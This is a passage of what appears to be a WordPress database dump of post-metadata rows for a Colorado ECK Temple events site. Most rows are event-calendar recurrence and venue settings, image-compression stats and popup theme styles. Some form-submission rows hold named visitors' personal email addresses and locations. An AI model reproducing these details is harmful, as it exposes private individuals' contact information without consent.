WP-Optimize'),(121036,263196,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:67003;s:12:\"smushed-size\";i:56604;s:15:\"savings-percent\";d:15.519999999999999573674358543939888477325439453125;}'),(121035,263196,'smush-complete','1'),(104810,262517,'protect_children',''),(104811,262517,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1607446652;s:12:\"_VenueOrigin\";i:1607446652;s:10:\"_edit_last\";i:1607446659;s:10:\"post_title\";i:1607446659;s:11:\"post_status\";i:1607446663;s:17:\"_EventShowMapLink\";i:1607446663;s:13:\"_EventShowMap\";i:1607446663;s:17:\"_VenueShowMapLink\";i:1607446663;s:13:\"_VenueShowMap\";i:1607446663;s:13:\"_VenueAddress\";i:1607446663;s:10:\"_VenueCity\";i:1607446663;s:13:\"_VenueCountry\";i:1607446663;s:14:\"_VenueProvince\";i:1607446663;s:11:\"_VenueState\";i:1607446663;s:9:\"_VenueZip\";i:1607446663;s:11:\"_VenuePhone\";i:1607446663;s:9:\"_VenueURL\";i:1607446663;s:19:\"_VenueStateProvince\";i:1607446663;s:21:\"_VenueOverwriteCoords\";i:1607446663;s:24:\"boldgrid_hide_page_title\";i:1607446663;}'),(104812,262517,'_VenueOrigin','events-calendar'),(104813,262517,'_edit_lock','1607471723:2'),(104814,262517,'_edit_last','2'),(104815,262517,'_EventShowMapLink','1'),(104816,262517,'_EventShowMap','1'),(104817,262517,'_VenueShowMapLink','1'),(104818,262517,'_VenueShowMap','1'),(104819,262517,'_VenueAddress',''),(104820,262517,'_VenueCity',''),(104821,262517,'_VenueCountry',''),(104822,262517,'_VenueProvince',''),(104823,262517,'_VenueState',''),(104824,262517,'_VenueZip',''),(104825,262517,'_VenuePhone',''),(104826,262517,'_VenueURL',''),(104827,262517,'_VenueStateProvince',''),(104828,262517,'_VenueOverwriteCoords','0'),(104829,262517,'boldgrid_hide_page_title','0'),(120889,263177,'_EventDuration','3600'),(121059,263203,'_EventOrigin','events-calendar'),(121060,263203,'_EventOrigin','events-calendar'),(121061,263203,'_EventOrigin','events-calendar'),(121062,263203,'_EventOrigin','events-calendar'),(121063,263203,'_EventOrigin','events-calendar'),(121064,263203,'_EventOrigin','events-calendar'),(121065,263203,'_EventOrigin','events-calendar'),(121049,263203,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1609619822;s:12:\"_EventOrigin\";i:1609619822;s:13:\"_thumbnail_id\";i:1609620137;s:24:\"boldgrid_hide_page_title\";i:1609619822;s:17:\"_EventShowMapLink\";i:1609619822;s:13:\"_EventShowMap\";i:1609619822;s:15:\"_EventStartDate\";i:1609620137;s:13:\"_EventEndDate\";i:1609620137;s:18:\"_EventStartDateUTC\";i:1609620137;s:16:\"_EventEndDateUTC\";i:1609620137;s:14:\"_EventDuration\";i:1609619822;s:20:\"_EventCurrencySymbol\";i:1609619822;s:22:\"_EventCurrencyPosition\";i:1609619822;s:10:\"_EventCost\";i:1609619822;s:9:\"_EventURL\";i:1609619822;s:14:\"_EventTimezone\";i:1609619822;s:18:\"_EventTimezoneAbbr\";i:1609619822;s:27:\"_EventNextPendingRecurrence\";i:1609619822;s:26:\"_RTECregistrationsDisabled\";i:1609619822;s:17:\"_RTECdeadlineType\";i:1609619822;s:19:\"_RTECwhoCanRegister\";i:1609619822;s:23:\"_RTEClimitRegistrations\";i:1609619822;s:21:\"_RTECmaxRegistrations\";i:1609619822;s:16:\"_EventRecurrence\";i:1609619822;s:18:\"_RTECnumRegistered\";i:1609619822;s:13:\"_EventVenueID\";i:1609619822;s:12:\"_dp_original\";i:1609619822;s:16:\"tribe_events_cat\";i:1609645563;s:10:\"_edit_last\";i:1609619907;s:10:\"post_title\";i:1609619907;s:12:\"post_content\";i:1609620363;s:11:\"post_status\";i:1609620137;}'),(121033,263196,'original-file','2021/01/loveland-center-nd-2-updraft-pre-smush-original.jpg'),(104835,262518,'_EventStartDate','2021-01-17 11:30:00'),(104836,262518,'_EventStartDateUTC','2021-01-17 18:30:00'),(104837,262518,'_EventEndDate','2021-01-17 13:00:00'),(93976,261738,'_field_225','Stein'),(93977,261738,'_field_226','martina.stein.bali@icloud.com'),(93978,261738,'_field_227','CO'),(93979,261738,'_field_228','DE'),(93980,261738,'_field_229','a:1:{i:0;s:39:\"Central Colorado/ECK Temple in Colorado\";}'),(93981,261738,'_form_id','21'),(93982,261738,'_seq_num','103'),(116294,262810,'_RTEClimitRegistrations','0'),(116295,262810,'_RTECmaxRegistrations','30'),(116291,262810,'_RTECregistrationsDisabled','1'),(116289,262810,'_EventOrigin','events-calendar'),(116296,262810,'boldgrid_hide_page_title','1'),(116297,262810,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"Third\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-17\";s:14:\"EventStartDate\";s:19:\"2020-12-20 09:00:00\";s:12:\"EventEndDate\";s:19:\"2020-12-20 10:15:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(115764,262796,'_EventShowMapLink','1'),(115765,262796,'_EventShowMap','1'),(115766,262796,'_EventVenueID','262507'),(95368,262024,'_wp_attached_file','2020/09/satsang-promo-bk-3-e1600103663613.jpg'),(95369,262024,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:539;s:6:\"height\";i:361;s:4:\"file\";s:45:\"2020/09/satsang-promo-bk-3-e1600103663613.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"satsang-promo-bk-3-300x201.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:201;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"satsang-promo-bk-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"satsang-promo-bk-3-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(115748,262795,'_EventCost',''),(115749,262795,'_EventURL',''),(115750,262795,'_EventTimezone','America/Denver'),(115751,262795,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:10:{i:262791;a:2:{s:9:\"timestamp\";i:1610874000;s:8:\"duration\";i:4200;}i:262792;a:2:{s:9:\"timestamp\";i:1613898000;s:8:\"duration\";i:4200;}i:262793;a:2:{s:9:\"timestamp\";i:1616317200;s:8:\"duration\";i:4200;}i:262794;a:2:{s:9:\"timestamp\";i:1618736400;s:8:\"duration\";i:4200;}i:262795;a:2:{s:9:\"timestamp\";i:1621155600;s:8:\"duration\";i:4200;}i:262796;a:2:{s:9:\"timestamp\";i:1624179600;s:8:\"duration\";i:4200;}i:262797;a:2:{s:9:\"timestamp\";i:1626598800;s:8:\"duration\";i:4200;}i:262798;a:2:{s:9:\"timestamp\";i:1629018000;s:8:\"duration\";i:4200;}i:262799;a:2:{s:9:\"timestamp\";i:1632042000;s:8:\"duration\";i:4200;}i:262800;a:2:{s:9:\"timestamp\";i:1634461200;s:8:\"duration\";i:4200;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(116693,262869,'_edit_lock','1619287650:2'),(117371,262892,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:10:{i:0;a:2:{s:9:\"timestamp\";i:1610280900;s:8:\"duration\";i:5400;}i:1;a:2:{s:9:\"timestamp\";i:1613304900;s:8:\"duration\";i:5400;}i:2;a:2:{s:9:\"timestamp\";i:1615724100;s:8:\"duration\";i:5400;}i:3;a:2:{s:9:\"timestamp\";i:1618143300;s:8:\"duration\";i:5400;}i:4;a:2:{s:9:\"timestamp\";i:1620562500;s:8:\"duration\";i:5400;}i:5;a:2:{s:9:\"timestamp\";i:1623586500;s:8:\"duration\";i:5400;}i:6;a:2:{s:9:\"timestamp\";i:1626005700;s:8:\"duration\";i:5400;}i:7;a:2:{s:9:\"timestamp\";i:1628424900;s:8:\"duration\";i:5400;}i:8;a:2:{s:9:\"timestamp\";i:1631448900;s:8:\"duration\";i:5400;}i:9;a:2:{s:9:\"timestamp\";i:1633868100;s:8:\"duration\";i:5400;}}s:6:\"update\";a:0:{}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(104838,262518,'_EventEndDateUTC','2021-01-17 20:00:00'),(117370,262892,'_EventTimezone','America/Denver'),(104839,262518,'_EventDuration','5400'),(95386,262024,'original-file','2020/09/satsang-promo-bk-3-updraft-pre-smush-original.jpg'),(95387,262024,'smush-complete','1'),(95388,262024,'smush-info','The file was compressed from 45.37 KB to 43.74 KB saving 3.59 percent using WP-Optimize'),(95389,262024,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:46458;s:12:\"smushed-size\";i:44790;s:15:\"savings-percent\";d:3.589999999999999857891452847979962825775146484375;}'),(95390,262024,'_wp_attachment_backup_sizes','a:1:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:539;s:6:\"height\";i:361;s:4:\"file\";s:22:\"satsang-promo-bk-3.jpg\";}}'),(188278,268838,'mec_start_time_minutes','0'),(188279,268838,'mec_start_time_ampm','PM'),(188280,268838,'mec_start_day_seconds','46800'),(121068,263203,'_thumbnail_id','263204'),(121066,263203,'_EventOrigin','events-calendar'),(121067,263203,'_EventOrigin','events-calendar'),(121039,263203,'_EventOrigin','events-calendar'),(121040,263203,'protect_children',''),(121041,263203,'protect_children',''),(121042,263203,'protect_children',''),(121043,263203,'protect_children',''),(121044,263203,'protect_children',''),(121045,263203,'protect_children',''),(121046,263203,'protect_children',''),(121047,263203,'protect_children',''),(104720,262507,'boldgrid_hide_page_title','0'),(121048,263203,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1609619822;s:12:\"_EventOrigin\";i:1609619822;s:13:\"_thumbnail_id\";i:1609620137;s:24:\"boldgrid_hide_page_title\";i:1609619822;s:17:\"_EventShowMapLink\";i:1609619822;s:13:\"_EventShowMap\";i:1609619822;s:15:\"_EventStartDate\";i:1609620137;s:13:\"_EventEndDate\";i:1609620137;s:18:\"_EventStartDateUTC\";i:1609620137;s:16:\"_EventEndDateUTC\";i:1609620137;s:14:\"_EventDuration\";i:1609619822;s:20:\"_EventCurrencySymbol\";i:1609619822;s:22:\"_EventCurrencyPosition\";i:1609619822;s:10:\"_EventCost\";i:1609619822;s:9:\"_EventURL\";i:1609619822;s:14:\"_EventTimezone\";i:1609619822;s:18:\"_EventTimezoneAbbr\";i:1609619822;s:27:\"_EventNextPendingRecurrence\";i:1609619822;s:26:\"_RTECregistrationsDisabled\";i:1609619822;s:17:\"_RTECdeadlineType\";i:1609619822;s:19:\"_RTECwhoCanRegister\";i:1609619822;s:23:\"_RTEClimitRegistrations\";i:1609619822;s:21:\"_RTECmaxRegistrations\";i:1609619822;s:16:\"_EventRecurrence\";i:1609619822;s:18:\"_RTECnumRegistered\";i:1609619822;s:13:\"_EventVenueID\";i:1609619822;s:12:\"_dp_original\";i:1609619822;s:16:\"tribe_events_cat\";i:1609645563;s:10:\"_edit_last\";i:1609619907;s:10:\"post_title\";i:1609619907;s:12:\"post_content\";i:1609620363;s:11:\"post_status\";i:1609620137;}'),(104709,262507,'_VenueShowMap','1'),(104710,262507,'_VenueAddress',''),(104711,262507,'_VenueCity',''),(104712,262507,'_VenueCountry',''),(104713,262507,'_VenueProvince',''),(104714,262507,'_VenueState',''),(104715,262507,'_VenueZip',''),(104716,262507,'_VenuePhone',''),(104717,262507,'_VenueURL',''),(104718,262507,'_VenueStateProvince',''),(104719,262507,'_VenueOverwriteCoords','0'),(104708,262507,'_VenueShowMapLink','1'),(121069,263203,'boldgrid_hide_page_title','0'),(121037,263203,'protect_children',''),(121038,263203,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1609619822;s:12:\"_EventOrigin\";i:1609619822;s:13:\"_thumbnail_id\";i:1609620137;s:24:\"boldgrid_hide_page_title\";i:1609619822;s:17:\"_EventShowMapLink\";i:1609619822;s:13:\"_EventShowMap\";i:1609619822;s:15:\"_EventStartDate\";i:1609620137;s:13:\"_EventEndDate\";i:1609620137;s:18:\"_EventStartDateUTC\";i:1609620137;s:16:\"_EventEndDateUTC\";i:1609620137;s:14:\"_EventDuration\";i:1609619822;s:20:\"_EventCurrencySymbol\";i:1609619822;s:22:\"_EventCurrencyPosition\";i:1609619822;s:10:\"_EventCost\";i:1609619822;s:9:\"_EventURL\";i:1609619822;s:14:\"_EventTimezone\";i:1609619822;s:18:\"_EventTimezoneAbbr\";i:1609619822;s:27:\"_EventNextPendingRecurrence\";i:1609619822;s:26:\"_RTECregistrationsDisabled\";i:1609619822;s:17:\"_RTECdeadlineType\";i:1609619822;s:19:\"_RTECwhoCanRegister\";i:1609619822;s:23:\"_RTEClimitRegistrations\";i:1609619822;s:21:\"_RTECmaxRegistrations\";i:1609619822;s:16:\"_EventRecurrence\";i:1609619822;s:18:\"_RTECnumRegistered\";i:1609619822;s:13:\"_EventVenueID\";i:1609619822;s:12:\"_dp_original\";i:1609619822;s:16:\"tribe_events_cat\";i:1609645563;s:10:\"_edit_last\";i:1609619907;s:10:\"post_title\";i:1609619907;s:12:\"post_content\";i:1609620363;s:11:\"post_status\";i:1609620137;}'),(104704,262507,'_edit_lock','1607464903:2'),(104705,262507,'_edit_last','2'),(104706,262507,'_EventShowMapLink','1'),(104707,262507,'_EventShowMap','1'),(160540,266604,'mec_start_time_ampm','AM'),(160538,266604,'mec_start_time_hour','11'),(160539,266604,'mec_start_time_minutes','45'),(160537,266604,'mec_start_date','2022-12-18'),(160536,266604,'mec_public','1'),(95879,262133,'popup_theme_settings','a:67:{s:24:\"overlay_background_color\";s:7:\"#000000\";s:26:\"overlay_background_opacity\";s:2:\"70\";s:13:\"atc_promotion\";N;s:17:\"container_padding\";s:1:\"0\";s:23:\"container_border_radius\";s:1:\"0\";s:26:\"container_background_color\";s:0:\"\";s:28:\"container_background_opacity\";s:1:\"0\";s:22:\"container_border_style\";s:4:\"none\";s:22:\"container_border_color\";s:7:\"#000000\";s:22:\"container_border_width\";s:1:\"1\";s:25:\"container_boxshadow_color\";s:7:\"#020202\";s:27:\"container_boxshadow_opacity\";s:1:\"0\";s:30:\"container_boxshadow_horizontal\";s:1:\"0\";s:28:\"container_boxshadow_vertical\";s:1:\"0\";s:24:\"container_boxshadow_blur\";s:1:\"0\";s:26:\"container_boxshadow_spread\";s:1:\"0\";s:25:\"container_boxshadow_inset\";s:2:\"no\";s:16:\"title_font_color\";s:7:\"#000000\";s:15:\"title_font_size\";s:2:\"32\";s:17:\"title_line_height\";s:2:\"36\";s:17:\"title_font_family\";s:7:\"inherit\";s:17:\"title_font_weight\";s:3:\"400\";s:16:\"title_font_style\";s:0:\"\";s:16:\"title_text_align\";s:4:\"left\";s:22:\"title_textshadow_color\";s:7:\"#020202\";s:24:\"title_textshadow_opacity\";s:2:\"23\";s:27:\"title_textshadow_horizontal\";s:1:\"0\";s:25:\"title_textshadow_vertical\";s:1:\"0\";s:21:\"title_textshadow_blur\";s:1:\"0\";s:18:\"content_font_color\";s:7:\"#8c8c8c\";s:19:\"content_font_family\";s:7:\"inherit\";s:19:\"content_font_weight\";s:3:\"400\";s:18:\"content_font_style\";s:0:\"\";s:10:\"close_text\";s:2:\"×\";s:22:\"close_position_outside\";i:0;s:14:\"close_location\";s:8:\"topright\";s:18:\"close_position_top\";s:1:\"7\";s:21:\"close_position_bottom\";s:1:\"0\";s:19:\"close_position_left\";s:1:\"0\";s:20:\"close_position_right\";s:1:\"7\";s:13:\"close_padding\";s:1:\"0\";s:12:\"close_height\";s:2:\"18\";s:11:\"close_width\";s:2:\"18\";s:19:\"close_border_radius\";s:2:\"15\";s:22:\"close_background_color\";s:7:\"#ffffff\";s:24:\"close_background_opacity\";s:1:\"0\";s:16:\"close_font_color\";s:7:\"#000000\";s:15:\"close_font_size\";s:2:\"20\";s:17:\"close_line_height\";s:2:\"20\";s:17:\"close_font_family\";s:7:\"inherit\";s:17:\"close_font_weight\";s:3:\"700\";s:16:\"close_font_style\";s:0:\"\";s:18:\"close_border_style\";s:4:\"none\";s:18:\"close_border_color\";s:7:\"#ffffff\";s:18:\"close_border_width\";s:1:\"1\";s:21:\"close_boxshadow_color\";s:7:\"#020202\";s:23:\"close_boxshadow_opacity\";s:1:\"0\";s:26:\"close_boxshadow_horizontal\";s:1:\"0\";s:24:\"close_boxshadow_vertical\";s:1:\"0\";s:20:\"close_boxshadow_blur\";s:1:\"0\";s:22:\"close_boxshadow_spread\";s:1:\"0\";s:21:\"close_boxshadow_inset\";s:2:\"no\";s:22:\"close_textshadow_color\";s:7:\"#000000\";s:24:\"close_textshadow_opacity\";s:1:\"0\";s:27:\"close_textshadow_horizontal\";s:1:\"0\";s:25:\"close_textshadow_vertical\";s:1:\"0\";s:21:\"close_textshadow_blur\";s:1:\"0\";}'),(95880,262133,'popup_theme_data_version','3'),(95881,262133,'_pum_built_in','content-only'),(95882,262133,'protect_children',''),(95883,262134,'popup_theme_settings','a:67:{s:24:\"overlay_background_color\";s:7:\"#000000\";s:26:\"overlay_background_opacity\";s:2:\"70\";s:13:\"atc_promotion\";N;s:17:\"container_padding\";s:1:\"0\";s:23:\"container_border_radius\";s:1:\"0\";s:26:\"container_background_color\";s:0:\"\";s:28:\"container_background_opacity\";s:1:\"0\";s:22:\"container_border_style\";s:4:\"none\";s:22:\"container_border_color\";s:7:\"#000000\";s:22:\"container_border_width\";s:1:\"1\";s:25:\"container_boxshadow_color\";s:7:\"#020202\";s:27:\"container_boxshadow_opacity\";s:1:\"0\";s:30:\"container_boxshadow_horizontal\";s:1:\"0\";s:28:\"container_boxshadow_vertical\";s:1:\"0\";s:24:\"container_boxshadow_blur\";s:1:\"0\";s:26:\"container_boxshadow_spread\";s:1:\"0\";s:25:\"container_boxshadow_inset\";s:2:\"no\";s:16:\"title_font_color\";s:7:\"#000000\";s:15:\"title_font_size\";s:2:\"32\";s:17:\"title_line_height\";s:2:\"36\";s:17:\"title_font_family\";s:7:\"inherit\";s:17:\"title_font_weight\";s:3:\"400\";s:16:\"title_font_style\";s:0:\"\";s:16:\"title_text_align\";s:4:\"left\";s:22:\"title_textshadow_color\";s:7:\"#020202\";s:24:\"title_textshadow_opacity\";s:2:\"23\";s:27:\"title_textshadow_horizontal\";s:1:\"0\";s:25:\"title_textshadow_vertical\";s:1:\"0\";s:21:\"title_textshadow_blur\";s:1:\"0\";s:18:\"content_font_color\";s:7:\"#8c8c8c\";s:19:\"content_font_family\";s:7:\"inherit\";s:19:\"content_font_weight\";s:3:\"400\";s:18:\"content_font_style\";s:0:\"\";s:10:\"close_text\";s:2:\"×\";s:22:\"close_position_outside\";i:0;s:14:\"close_location\";s:8:\"topright\";s:18:\"close_position_top\";s:1:\"7\";s:21:\"close_position_bottom\";s:1:\"0\";s:19:\"close_position_left\";s:1:\"0\";s:20:\"close_position_right\";s:1:\"7\";s:13:\"close_padding\";s:1:\"0\";s:12:\"close_height\";s:2:\"18\";s:11:\"close_width\";s:2:\"18\";s:19:\"close_border_radius\";s:2:\"15\";s:22:\"close_background_color\";s:7:\"#ffffff\";s:24:\"close_background_opacity\";s:1:\"0\";s:16:\"close_font_color\";s:7:\"#000000\";s:15:\"close_font_size\";s:2:\"20\";s:17:\"close_line_height\";s:2:\"20\";s:17:\"close_font_family\";s:7:\"inherit\";s:17:\"close_font_weight\";s:3:\"700\";s:16:\"close_font_style\";s:0:\"\";s:18:\"close_border_style\";s:4:\"none\";s:18:\"close_border_color\";s:7:\"#ffffff\";s:18:\"close_border_width\";s:1:\"1\";s:21:\"close_boxshadow_color\";s:7:\"#020202\";s:23:\"close_boxshadow_opacity\";s:1:\"0\";s:26:\"close_boxshadow_horizontal\";s:1:\"0\";s:24:\"close_boxshadow_vertical\";s:1:\"0\";s:20:\"close_boxshadow_blur\";s:1:\"0\";s:22:\"close_boxshadow_spread\";s:1:\"0\";s:21:\"close_boxshadow_inset\";s:2:\"no\";s:22:\"close_textshadow_color\";s:7:\"#000000\";s:24:\"close_textshadow_opacity\";s:1:\"0\";s:27:\"close_textshadow_horizontal\";s:1:\"0\";s:25:\"close_textshadow_vertical\";s:1:\"0\";s:21:\"close_textshadow_blur\";s:1:\"0\";}'),(95884,262134,'popup_theme_data_version','3'),(95885,262134,'_pum_built_in','content-only'),(95886,262134,'protect_children',''),(95887,262135,'popup_theme_settings','a:67:{s:24:\"overlay_background_color\";s:7:\"#000000\";s:26:\"overlay_background_opacity\";s:2:\"70\";s:13:\"atc_promotion\";N;s:17:\"container_padding\";s:1:\"0\";s:23:\"container_border_radius\";s:1:\"0\";s:26:\"container_background_color\";s:0:\"\";s:28:\"container_background_opacity\";s:1:\"0\";s:22:\"container_border_style\";s:4:\"none\";s:22:\"container_border_color\";s:7:\"#000000\";s:22:\"container_border_width\";s:1:\"1\";s:25:\"container_boxshadow_color\";s:7:\"#020202\";s:27:\"container_boxshadow_opacity\";s:1:\"0\";s:30:\"container_boxshadow_horizontal\";s:1:\"0\";s:28:\"container_boxshadow_vertical\";s:1:\"0\";s:24:\"container_boxshadow_blur\";s:1:\"0\";s:26:\"container_boxshadow_spread\";s:1:\"0\";s:25:\"container_boxshadow_inset\";s:2:\"no\";s:16:\"title_font_color\";s:7:\"#000000\";s:15:\"title_font_size\";s:2:\"32\";s:17:\"title_line_height\";s:2:\"36\";s:17:\"title_font_family\";s:7:\"inherit\";s:17:\"title_font_weight\";s:3:\"400\";s:16:\"title_font_style\";s:0:\"\";s:16:\"title_text_align\";s:4:\"left\";s:22:\"title_textshadow_color\";s:7:\"#020202\";s:24:\"title_textshadow_opacity\";s:2:\"23\";s:27:\"title_textshadow_horizontal\";s:1:\"0\";s:25:\"title_textshadow_vertical\";s:1:\"0\";s:21:\"title_textshadow_blur\";s:1:\"0\";s:18:\"content_font_color\";s:7:\"#8c8c8c\";s:19:\"content_font_family\";s:7:\"inherit\";s:19:\"content_font_weight\";s:3:\"400\";s:18:\"content_font_style\";s:0:\"\";s:10:\"close_text\";s:2:\"×\";s:22:\"close_position_outside\";i:0;s:14:\"close_location\";s:8:\"topright\";s:18:\"close_position_top\";s:1:\"7\";s:21:\"close_position_bottom\";s:1:\"0\";s:19:\"close_position_left\";s:1:\"0\";s:20:\"close_position_right\";s:1:\"7\";s:13:\"close_padding\";s:1:\"0\";s:12:\"close_height\";s:2:\"18\";s:11:\"close_width\";s:2:\"18\";s:19:\"close_border_radius\";s:2:\"15\";s:22:\"close_background_color\";s:7:\"#ffffff\";s:24:\"close_background_opacity\";s:1:\"0\";s:16:\"close_font_color\";s:7:\"#000000\";s:15:\"close_font_size\";s:2:\"20\";s:17:\"close_line_height\";s:2:\"20\";s:17:\"close_font_family\";s:7:\"inherit\";s:17:\"close_font_weight\";s:3:\"700\";s:16:\"close_font_style\";s:0:\"\";s:18:\"close_border_style\";s:4:\"none\";s:18:\"close_border_color\";s:7:\"#ffffff\";s:18:\"close_border_width\";s:1:\"1\";s:21:\"close_boxshadow_color\";s:7:\"#020202\";s:23:\"close_boxshadow_opacity\";s:1:\"0\";s:26:\"close_boxshadow_horizontal\";s:1:\"0\";s:24:\"close_boxshadow_vertical\";s:1:\"0\";s:20:\"close_boxshadow_blur\";s:1:\"0\";s:22:\"close_boxshadow_spread\";s:1:\"0\";s:21:\"close_boxshadow_inset\";s:2:\"no\";s:22:\"close_textshadow_color\";s:7:\"#000000\";s:24:\"close_textshadow_opacity\";s:1:\"0\";s:27:\"close_textshadow_horizontal\";s:1:\"0\";s:25:\"close_textshadow_vertical\";s:1:\"0\";s:21:\"close_textshadow_blur\";s:1:\"0\";}'),(95888,262135,'popup_theme_data_version','3'),(95889,262135,'_pum_built_in','content-only'),(95890,261877,'enabled','0'),(95891,161672,'enabled','1'),(95900,262137,'_field_224','Nancy'),(95901,262137,'_field_225','Shapiro'),(95902,262137,'_field_226','Optimystic2@gmail.com'),(95903,262137,'_field_227','CO'),(95904,262137,'_field_228','US'),(95905,262137,'_field_229','a:1:{i:0;s:39:\"Central Colorado/ECK Temple in Colorado\";}'),(95906,262137,'_form_id','21'),(95907,262137,'_seq_num','108'),(128912,263459,'_RTECnumRegistered','0'),(128876,263459,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1611754998;s:12:\"_EventOrigin\";i:1611754998;s:13:\"_thumbnail_id\";i:1611755387;s:24:\"boldgrid_hide_page_title\";i:1611754998;s:17:\"_EventShowMapLink\";i:1611754998;s:13:\"_EventShowMap\";i:1611754998;s:15:\"_EventStartDate\";i:1611755387;s:13:\"_EventEndDate\";i:1611755387;s:18:\"_EventStartDateUTC\";i:1611755387;s:16:\"_EventEndDateUTC\";i:1611755387;s:14:\"_EventDuration\";i:1611755387;s:20:\"_EventCurrencySymbol\";i:1611754998;s:22:\"_EventCurrencyPosition\";i:1611754998;s:10:\"_EventCost\";i:1611754998;s:9:\"_EventURL\";i:1611754998;s:14:\"_EventTimezone\";i:1611754998;s:18:\"_EventTimezoneAbbr\";i:1611754998;s:27:\"_EventNextPendingRecurrence\";i:1611754998;s:26:\"_RTECregistrationsDisabled\";i:1611754998;s:17:\"_RTECdeadlineType\";i:1611754998;s:19:\"_RTECwhoCanRegister\";i:1611754998;s:23:\"_RTEClimitRegistrations\";i:1611754998;s:21:\"_RTECmaxRegistrations\";i:1611754998;s:16:\"_EventRecurrence\";i:1611754998;s:18:\"_RTECnumRegistered\";i:1611754999;s:13:\"_EventVenueID\";i:1611754999;s:12:\"_dp_original\";i:1611754999;s:16:\"tribe_events_cat\";i:1611781382;s:10:\"_edit_last\";i:1611755021;s:12:\"post_content\";i:1611756114;s:10:\"post_title\";i:1611755097;s:11:\"post_status\";i:1611755387;}'),(128891,263459,'boldgrid_hide_page_title','0'),(128898,263459,'_EventDuration','3600'),(128899,263459,'_EventCurrencySymbol',''),(128877,263459,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1611754998;s:12:\"_EventOrigin\";i:1611754998;s:13:\"_thumbnail_id\";i:1611755387;s:24:\"boldgrid_hide_page_title\";i:1611754998;s:17:\"_EventShowMapLink\";i:1611754998;s:13:\"_EventShowMap\";i:1611754998;s:15:\"_EventStartDate\";i:1611755387;s:13:\"_EventEndDate\";i:1611755387;s:18:\"_EventStartDateUTC\";i:1611755387;s:16:\"_EventEndDateUTC\";i:1611755387;s:14:\"_EventDuration\";i:1611755387;s:20:\"_EventCurrencySymbol\";i:1611754998;s:22:\"_EventCurrencyPosition\";i:1611754998;s:10:\"_EventCost\";i:1611754998;s:9:\"_EventURL\";i:1611754998;s:14:\"_EventTimezone\";i:1611754998;s:18:\"_EventTimezoneAbbr\";i:1611754998;s:27:\"_EventNextPendingRecurrence\";i:1611754998;s:26:\"_RTECregistrationsDisabled\";i:1611754998;s:17:\"_RTECdeadlineType\";i:1611754998;s:19:\"_RTECwhoCanRegister\";i:1611754998;s:23:\"_RTEClimitRegistrations\";i:1611754998;s:21:\"_RTECmaxRegistrations\";i:1611754998;s:16:\"_EventRecurrence\";i:1611754998;s:18:\"_RTECnumRegistered\";i:1611754999;s:13:\"_EventVenueID\";i:1611754999;s:12:\"_dp_original\";i:1611754999;s:16:\"tribe_events_cat\";i:1611781382;s:10:\"_edit_last\";i:1611755021;s:12:\"post_content\";i:1611756114;s:10:\"post_title\";i:1611755097;s:11:\"post_status\";i:1611755387;}'),(128879,263459,'_EventOrigin','events-calendar'),(128880,263459,'_EventOrigin','events-calendar'),(128881,263459,'_EventOrigin','events-calendar'),(128882,263459,'_EventOrigin','events-calendar'),(128883,263459,'_EventOrigin','events-calendar'),(128884,263459,'_EventOrigin','events-calendar'),(128885,263459,'_EventOrigin','events-calendar'),(128886,263459,'_EventOrigin','events-calendar'),(128887,263459,'_EventOrigin','events-calendar'),(128888,263459,'_EventOrigin','events-calendar'),(128889,263459,'_EventOrigin','events-calendar'),(128890,263459,'_thumbnail_id','263460'),(128900,263459,'_EventCurrencyPosition','prefix'),(128878,263459,'_EventOrigin','events-calendar'),(128913,263459,'_EventVenueID','262435'),(128915,263459,'_dp_original','263208'),(128916,263459,'_edit_lock','1611781729:2'),(128917,263459,'_edit_last','2'),(128918,263460,'_wp_attached_file','2021/01/green-mtn-path.jpg'),(128919,263460,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:466;s:6:\"height\";i:264;s:4:\"file\";s:26:\"2021/01/green-mtn-path.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"green-mtn-path-300x170.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:170;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnai